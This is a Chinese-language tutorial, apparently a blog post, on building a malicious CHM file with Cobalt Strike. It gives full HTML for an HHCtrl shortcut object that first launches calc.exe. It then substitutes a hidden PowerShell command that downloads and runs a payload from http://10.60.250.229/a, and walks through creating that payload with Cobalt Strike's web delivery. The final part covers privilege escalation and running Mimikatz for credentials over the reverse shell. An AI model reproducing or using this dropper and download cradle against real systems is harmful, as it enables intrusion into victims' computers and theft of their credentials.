一、命令执行(calc)木马生成

1.生成木马

首先创建一个根目录,文件名为exp
在文件夹里创建两个目录和一个index.html文件
在两个目录里分别创建txt文件或html文件
Colbalt Strike之CHM木马
index.html写入以下内容

<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>
command exec 
<OBJECT id=x class width=1 height=1>
<PARAM name="Command" value="ShortCut">
 <PARAM name="Button" value="Bitmap::shortcut">
 <PARAM name="Item1" value=',calc.exe'>
 <PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body></html>

Colbalt Strike之CHM木马
启动EasyCHM软件,点击新建
Colbalt Strike之CHM木马
点击浏览
Colbalt Strike之CHM木马
选择exp文件夹,点确定
Colbalt Strike之CHM木马

点击工具栏的编译按钮
Colbalt Strike之CHM木马
弹出对话框,点击生成CHM,会在桌面生成一个CHM文件

Colbalt Strike之CHM木马
Colbalt Strike之CHM木马

2.测试

把文件放到目标机器,运行,成功弹出计算器
Colbalt Strike之CHM木马

二、power shell 反向HTTP连接 木马生成

1.启动Colbalt Strike

新建一个payload,点击Cobalt Strike --> Listeners
Colbalt Strike之CHM木马
点击Add
Colbalt Strike之CHM木马
填好Name Host Port,点击save

Colbalt Strike之CHM木马

2.生成木马

点击菜单 attacks --> web Drive by --> scripted web Delovery
Colbalt Strike之CHM木马
type类型设置powershell 单机launch
Colbalt Strike之CHM木马
生成结果
Colbalt Strike之CHM木马
用代码将index.html中的calc.exea替换

<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>
command exec 
<OBJECT id=x class width=1 height=1>
<PARAM name="Command" value="ShortCut">
 <PARAM name="Button" value="Bitmap::shortcut">
 <PARAM name="Item1" value=",powershell.exe, -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://10.60.250.229:80/a'))">
 <PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body></html>

Colbalt Strike之CHM木马

  • 需要将原有的单引号换成双引号
  • powershell 后面加入逗号
  • IEX前面和对应的双引号删除
  • 网址换成单引号

3.测试

编译生成,运行如下
Colbalt Strike之CHM木马

三、提权。

在要提权的shell右键点击Access --> Elevate

Colbalt Strike之CHM木马

然后再点击 Access --> Run Minmikatz

Colbalt Strike之CHM木马

成功反弹。

Colbalt Strike之CHM木马

相关文章:

  • 2021-12-09
  • 2021-06-08
  • 2021-12-28
  • 2022-12-23
  • 2021-09-17
  • 2021-11-19
  • 2021-12-28
  • 2021-07-26
猜你喜欢
  • 2022-12-23
  • 2022-12-23
  • 2022-12-23
  • 2021-09-26
  • 2022-01-31
  • 2021-12-18
  • 2021-08-21
相关资源
相似解决方案